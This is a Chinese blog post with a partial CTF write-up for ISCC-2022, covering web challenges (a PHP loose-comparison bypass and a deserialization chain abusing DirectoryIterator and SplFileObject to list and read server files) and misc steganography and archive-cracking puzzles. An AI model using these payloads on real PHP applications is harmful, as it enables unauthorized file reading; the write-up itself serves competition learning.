<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>ISCC-2022（部分wp） |  欲</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    <link rel="alternate" href="/atom.xml" title="欲" type="application/atom+xml">
</head>
  </html>
</html>


<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-ISCC-2022（部分wp）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  ISCC-2022（部分wp）
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2022/05/12/ISCC-2022%EF%BC%88%E9%83%A8%E5%88%86wp%EF%BC%89/" class="article-date">
  <time datetime="2022-05-12T12:52:01.000Z" itemprop="datePublished">2022-05-12</time>
</a>   
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.5k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">7 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="ISCC-2022（部分wp）"><a href="#ISCC-2022（部分wp）" class="headerlink" title="ISCC-2022（部分wp）"></a>ISCC-2022（部分wp）</h1><h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="冬奥会"><a href="#冬奥会" class="headerlink" title="冬奥会"></a>冬奥会</h2><span id="more"></span>
<p>（1）码源</p>
<pre><code>&lt;?php

show_source(__FILE__);

$Step1=False;
$Step2=False;

$info=(array)json_decode(@$_GET[&#39;Information&#39;]);

if(is_array($info))&#123;

    var_dump($info);

    is_numeric(@$info[&quot;year&quot;])?die(&quot;Sorry~&quot;):NULL;
    if(@$info[&quot;year&quot;])&#123;
        ($info[&quot;year&quot;]=2022)?$Step1=True:NULL;
    &#125;
    if(is_array(@$info[&quot;items&quot;]))&#123;
        if(!is_array($info[&quot;items&quot;][1])OR count($info[&quot;items&quot;])!==3 ) die(&quot;Sorry~&quot;);
        $status = array_search(&quot;skiing&quot;, $info[&quot;items&quot;]);
        $status===false?die(&quot;Sorry~&quot;):NULL;
        foreach($info[&quot;items&quot;] as $key=&gt;$val)&#123;
            $val===&quot;skiing&quot;?die(&quot;Sorry~&quot;):NULL;
        &#125;
        $Step2=True;
    &#125;
&#125;

if($Step1 &amp;&amp; $Step2)&#123;
    include &quot;2022flag.php&quot;;echo $flag;
&#125;
?&gt; 
</code></pre>
<p>（2）用JSON格式的字符串对information传值，里面要求year=2022，并且2022不能为数字，可以用%20绕过，items是个数为3数组，intems[1]也为数组，并且in_array()函数的解释是bool in_array ( mixed needle,arrayhaystack [, bool strict=FALSE]),如果strict参数没有提供或者是false(true会进行严格的过滤)，那么inarray就会使用松散比较来判断needle是否在$haystack中，利用函数接入到了不符合的类型返回“0”这个特性，直接绕过检测。所有让items[1]或items[3]其中一个为0即可。</p>
<pre><code>payload：?Information=&#123;&quot;year&quot;:&quot;2022 &quot;,&quot;items&quot;:[1,[1],0]&#125;
</code></pre>
<h2 id="Pop2022"><a href="#Pop2022" class="headerlink" title="Pop2022"></a>Pop2022</h2><p>这题其实和nss有一题是完全一样的，套一下payload就出来了</p>
<h2 id="findme"><a href="#findme" class="headerlink" title="findme"></a>findme</h2><p>（1）F12查看源代码，得到另外一个页面</p>
<p>（2）看到码源想到原生类</p>
<p>（3）先用DirectoryIterator指令找一下flag</p>
<pre><code>data=O:1:&quot;a&quot;:5:&#123;s:3:&quot;un0&quot;;s:17:&quot;DirectoryIterator&quot;;s:3:&quot;un1&quot;;s:23:&quot;glob:///var/www/html/f*&quot;;s:3:&quot;un2&quot;;N;s:3:&quot;un3&quot;;s:11:&quot;unserialize&quot;;s:3:&quot;un4&quot;;N;&#125;
</code></pre>
<p>Your output: fSSsybePonk_FIndMe.txt，还好没有直接输flag，不然还真的找不出来。</p>
<p>然后再用SplFileObject指令读取，</p>
<pre><code>&#123;s:3:&quot;un0&quot;;s:13:&quot;SplFileObject&quot;;s:3:&quot;un1&quot;;s:36:&quot;/var/www/html/fSSsybePonk_FIndMe.txt&quot;;s:3:&quot;un2&quot;;N;s:3:&quot;un3&quot;;s:11:&quot;unserialize&quot;;s:3:&quot;un4&quot;;N;&#125;
</code></pre>
<p>flag就出来了</p>
<p>（4）构建的poc</p>
<pre><code>poc：
 &lt;?php


class a&#123;
    public $un0 = &#39;SplFileObject&#39;;
    public $un1 = &quot;/var/www/html/fSSsybePonk_FIndMe.txt&quot;;
    public $un2;
    public $un3= &#39;unserialize&#39;; //= &#39;unserialize&#39;;
    public $un4;
    
    public function __destruct()&#123;
        if(!empty($this-&gt;un0) &amp;&amp; empty($this-&gt;un2))&#123;
            $this -&gt; Givemeanew();
            if($this -&gt; un3 === &#39;unserialize&#39;)&#123;
                $this -&gt; yigei();
            &#125;
            else&#123;
                $this -&gt; giao();
            &#125;
        &#125;
    &#125;

    public function Givemeanew()&#123;


        $this -&gt; un4 = new $this-&gt;un0($this-&gt; un1);        //123;//$this -&gt; un2 =&quot;;echo success;&quot;

        
    &#125;

    public function yigei()&#123;

        echo &#39;Your output: &#39;.$this-&gt;un4;

    &#125;
    
    public function giao()&#123;

        @eval($this-&gt;un2);

    &#125;
    
    public function __wakeup()&#123;

        include $this -&gt; un2.&#39;hint.php&#39;; 
    &#125;
&#125;


$data = new a();
$b=serialize($data); 
echo serialize($data); 
unserialize($b);
</code></pre>
<h1 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h1><h2 id="单板小将苏翊鸣"><a href="#单板小将苏翊鸣" class="headerlink" title="单板小将苏翊鸣"></a>单板小将苏翊鸣</h2><p>（1）一张图片和一个加密的压缩包<br>用101edit打开，发现CRC报错，猜测可能是图片的宽高被修改，改一下高，爆了一个二维码。</p>
<p>（2）扫一下，得到Unicode码，解一下<br>\u5728\u8fd9\u6b21\u51ac\u5965\u4f1a\u7684\u821e\u53f0\u4e0a\uff0c\u6211\u56fd\u5c0f\u5c06\u82cf\u7fca\u9e23\u65a9\u83b7\u4e00\u91d1\u4e00\u94f6\uff0c\u90a3\u4f60\u77e5\u9053\u6b64\u6b21\u51ac\u5965\u4f1a\u6211\u56fd\u603b\u5171\u83b7\u5f97\u51e0\u679a\u5956\u724c\u5417\uff1f\u53c8\u5206\u522b\u662f\u51e0\u91d1\u51e0\u94f6\u51e0\u94dc\u5462\uff1f<br>在这次冬奥会的舞台上，我国小将苏翊鸣斩获一金一银，那你知道此次冬奥会我国总共获得几枚奖牌吗？又分别是几金几银几铜呢？<br>15942</p>
<p>（3）打开压缩包，就有flag。</p>
<h2 id="2022冬奥会"><a href="#2022冬奥会" class="headerlink" title="2022冬奥会"></a>2022冬奥会</h2><p>和上一题一个思路，同样是改一下高度，爆出Unicode码，截屏识别一下，问你雪融融原型是什么。</p>
<p>灯笼，打开压缩包，有一张损坏的图片，用101打开一下，就有flag。</p>
<h2 id="藏在星空中的诗-1"><a href="#藏在星空中的诗-1" class="headerlink" title="藏在星空中的诗-1"></a>藏在星空中的诗-1</h2><p>（1）有个文本和一张图片和一个加密的压缩包</p>
<p>用ps打开图片，发现有两个图层，其中一个透明度很低，改高点，有一个五角星。</p>
<p><img src="https://s2.loli.net/2022/05/14/roOx4VhtsjWH6kR.png" alt="图片.png"></p>
<p>（2）按顺序把文本里的星星符号粘贴到压缩包，得到一个pdf文件，在按pdf文件一个个对应星星图案翻译出flag。</p>
<h2 id="藏在星空中的诗-2"><a href="#藏在星空中的诗-2" class="headerlink" title="藏在星空中的诗-2"></a>藏在星空中的诗-2</h2><p>（1）先把txt的文本用，星星1的表格对照一下</p>
<pre><code>\QTTPU\QTTED\QTTPD\QTTPD\QTTKB\QTTPR\QTTDE\QTT=B\QTTEK\QTTET\QTTFO\QTTPO\QTTEP\QTTPK\QTTFI\QTTK=\QTTKK\QTTPT\QTT=P\QTTKH
</code></pre>
<p>（2）把重复的去掉</p>
<p>\PU\ED\PD\PD\KB\PR\DE=B\EK\ET\FO\PO\EP\PK\FI\K=\KK\PT=P\KH</p>
<p>感觉应该是Unicode码。</p>
<p>\PU\ED\PD\PD有两个pd对于的应该是ISCC。</p>
<p>（3）回到对照表，找了好久才发现，要用星星图案对应的Unicode码取最后一位拼接起来。</p>
<pre><code>\u0049\u0053\u0043\u0043\u007b\u004c\u0035\u002b\u0057\u0050\u006f\u004f\u0054\u0047\u0061\u0072\u0077\u0040\u0024\u007d
</code></pre>
<p>（4）在用Unicode转码一下，就有flag。</p>
<h2 id="真相只有一个"><a href="#真相只有一个" class="headerlink" title="真相只有一个"></a>真相只有一个</h2><p>（1）一张图片，一个txt，一个stram</p>
<p>图片不知道是用来干什么的，先放一边。</p>
<p>（2）看了看stream好像缺了文件头，改一下，后缀顺便改成zip，好像有加密，先用ziperello爆破一下zip，跑出密码19981111，这好像要去图片里找，没想到提前出来了。</p>
<p>（3）解压缩包，得stram文件，wireshark打开，找到了一个MP3文件，导出来，在password.mp3最后听出了一段摩斯密码</p>
<p>解出来是isccmisc</p>
<p>（4）看txt里的内容加密的方式应该是snow加密，配合上面解出来的密码，用snow.exe，解密一下。</p>
<p>得到一串这个玩意，QUmu-U6LP-Gcto</p>
<p>套进ISCC{}看看，好像可以。</p>
<h2 id="whereistheflag"><a href="#whereistheflag" class="headerlink" title="whereistheflag"></a>whereistheflag</h2><p>博主太菜了，开始的时候也有试过lsb隐写，rgb000也看过很多次，就愣是看不出有问题。后面看大佬的wp才知道，真的有问题。</p>
<p>（1）先把题目的那一串base64码解密一下，解开压缩包。</p>
<p>（2）用stegsolve里的lsb隐写</p>
<p><img src="https://s2.loli.net/2022/05/26/GAepakH7NJoIlUv.png" alt="图片.png"></p>
<p>提取出最前面一段的十六进制码（我就为什么看不出来呢）</p>
<pre><code>ffffd254d0d0dedc90de569bdc1a0cd5cd1893921bd89c118dd9145f41f8007ffffc7e3fe00fff0071ffff
</code></pre>
<p>（3）把上面的码转为二进制</p>
<p>由于0~127位前面的ascii码是由00000000到01111111，因此转码出来后把第一个0前面的东西都删掉。每八位对应一个字符。</p>
<pre><code>01001001 01010011 01000011 01000011 01111011 01110010 01000011 01111001 01011010 01101111 01110000 01101000 00110011 01010111 00110100 01100010 01001110 01001000 01101111 01100010 01110000 01000110 00110111 01100100 01010001 01111101 00000111
</code></pre>
<p>后面由以1开头的则去掉，弄好后转成ASCII码对应的字符就行了。</p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2022/05/12/ISCC-2022%EF%BC%88%E9%83%A8%E5%88%86wp%EF%BC%89/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2022/06/21/sdctf2022_Ishihara_test++/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            sdctf2022_Ishihara_test++
          
        </div>
      </a>
    
    
      <a href="/2022/04/24/%E7%A5%9E%E5%A5%87%E7%9A%84Unicode%E7%BC%96%E7%A0%81-%E5%BC%BA%E5%88%B6%E6%94%B9%E5%8F%98%E9%80%89%E4%B8%AD%E9%A1%BA%E5%BA%8F/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">神奇的Unicode编码_强制改变选中顺序</div>
      </a>
    
  </nav>

  
   
    
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2021-2022
        <i class="ri-heart-fill heart_icon"></i> 00hello00
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/tx.jpg" alt="欲"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags/%E7%AC%94%E8%AE%B0/">笔记</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E6%BC%8F%E6%B4%9E">漏洞</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/zfb.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wx.png">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->

<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>